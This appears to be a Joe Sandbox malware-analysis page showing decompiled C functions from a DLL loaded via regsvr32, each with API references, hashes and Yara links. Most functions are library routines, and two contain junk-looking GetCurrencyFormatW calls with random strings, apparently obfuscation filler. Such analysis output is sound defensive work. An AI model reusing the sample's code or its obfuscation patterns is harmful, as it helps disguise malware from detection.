Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
Instruction ID: 281bcab43dd18555d5c8873d9ecd9dd0d63f565addb1b321d849296a265f2762
Opcode Fuzzy Hash: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
Instruction Fuzzy Hash: B0F09636201A115FF741AF658C8893FB7ACEFC96E6B02403AFD05D2116EE618D058271

Uniqueness

Uniqueness Score: -1.00%

Function 10008219 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008219() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1000EFCE(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E10007C2C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E1001FC9C(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 10008239
GetActiveWindow.USER32 ref: 10008244
SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E

Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
Instruction ID: 9d83087e220dd0781b059ca2b134525f77e60f6c7b422949920854a7550f5502
Opcode Fuzzy Hash: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
Instruction Fuzzy Hash: A0F03C34900A19CFEF12DB64CD855ADB7F1FF88B81B200528E48276169CB726E40CF21

Uniqueness

Uniqueness Score: -1.00%

Function 1001E221 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1001E221(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x10048888;
					if( *0x10048888 == 0) {
						_t5 = GetTickCount();
						 *0x10048888 =  *0x10048888 + 1;
						__eflags =  *0x10048888;
						 *0x100453a0 = _t5;
					}
					_t4 = GetTickCount() -  *0x100453a0;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100453a0 = _t4;
					}
					return _t4;
				}
				return E1001E1CA(_t7, _t8, _t9, _t13, _t14, _a8);
			}

APIs

GetTickCount.KERNEL32 ref: 1001E243
GetTickCount.KERNEL32 ref: 1001E250
CoFreeUnusedLibraries.OLE32 ref: 1001E25F
GetTickCount.KERNEL32 ref: 1001E265

Part of subcall function 1001E1CA: CoFreeUnusedLibraries.OLE32(00000000,1001E2A9,00000000), ref: 1001E20E
Part of subcall function 1001E1CA: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1001E2A9), ref: 1001E214

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
Instruction ID: 9aa4607869117499f4b65bf9b804208a697730aabcf92e8cb44ab6419cd381d0
Opcode Fuzzy Hash: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
Instruction Fuzzy Hash: D2E0ED30C04265DEE705EF20CE8464D3AE4FB4A392F914916E441DA161C7749EC0DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001842E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001842E(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10004D4A( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10004D4A( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E10017B9D(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10020F40(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E1000911A( &_v20);
										E100157C0(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10004D75(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10004D75(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E10017B9D(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

APIs

VariantClear.OLEAUT32(?), ref: 10018467

Strings

(, xrefs: 10018577

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
Instruction ID: 6ae8da63e7d5010fc6edffe141db471ece515f0fbfe2aaea2c8eafc942244063
Opcode Fuzzy Hash: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
Instruction Fuzzy Hash: A6516875A00B01DFDB64CF68C9C295AB7F1FF48314B504A6EE5868BA91CB70FA80CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1001615A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E1001615A(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1001FBC4(E10034098, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x1003b29c);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E1001FC9C(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E1001BDF4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x100388d8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x100388dc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x1003b2ec);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x10044410;
					E100209E8( &_v24, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t128, _t153, _t155);
					_t132 = E100105C8(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1000E58E(_t132);
					}
					return E1001FC9C(_t90);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 10016161

Strings

@, xrefs: 100161C4

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
Instruction ID: a1e3f74af39593b6165eabf356290d244c81fe92429bd0fa7cefced01a7d7b0f
Opcode Fuzzy Hash: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
Instruction Fuzzy Hash: 3351B671A0021A9FDB04CFA8C8849EEB7F9FF48304F15456EE516EB251EB74A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100061E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100061E5(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10045580; // 0x771f5646
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10005C93(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10005EFE(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1001FBB5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000620B
PathFindExtensionA.SHLWAPI(?), ref: 10006221

Part of subcall function 10005C93: _strcpy_s.LIBCMT ref: 10005C9F

Part of subcall function 10005EFE: __EH_prolog3.LIBCMT ref: 10005F1D
Part of subcall function 10005EFE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
Part of subcall function 10005EFE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
Part of subcall function 10005EFE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
Part of subcall function 10005EFE: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004

Strings

%s.dll, xrefs: 10006227

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
Instruction ID: 87bbfe94c284bf79419f18a095101e7eadcc839ae2e31c05850216e2d59394d5
Opcode Fuzzy Hash: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
Instruction Fuzzy Hash: A001F972A0051C6FEB19DB74CD569EE73B9EF08740F0101A9F502E7144EA71AE048751

Uniqueness

Uniqueness Score: -1.00%

Function 100014F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100014F4(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v12 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x30;
				_v8 =  *[fs:ebx];
				return _v8;
			}

0x10001522
0x1000152b
0x10001533

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001512

Strings

xadqsavcbdfewescGADW, xrefs: 100014FF
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001506

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
Instruction ID: 41eada4d2328894fcd37416b6f2f2abe75c7e90fa58e6643f2faad819eee2c9b
Opcode Fuzzy Hash: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
Instruction Fuzzy Hash: 42E0B6B5A50208BFE705CB88DDD6FCABBB8EB09705F114055F705EB691D3B0AA508A64

Uniqueness

Uniqueness Score: -1.00%

Function 10001DE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001DE9(void* __esi, intOrPtr _a4) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  !(__esi - 1) & _a4 + __esi - 0x00000001;
			}

0x10001e1f

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E01

Strings

xadqsavcbdfewescGADW, xrefs: 10001DEE
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DF5

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
Instruction ID: a6bb75da600a1c00fcd3d833fe1878cb6779512402ee289b34badc6351d60fc0
Opcode Fuzzy Hash: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
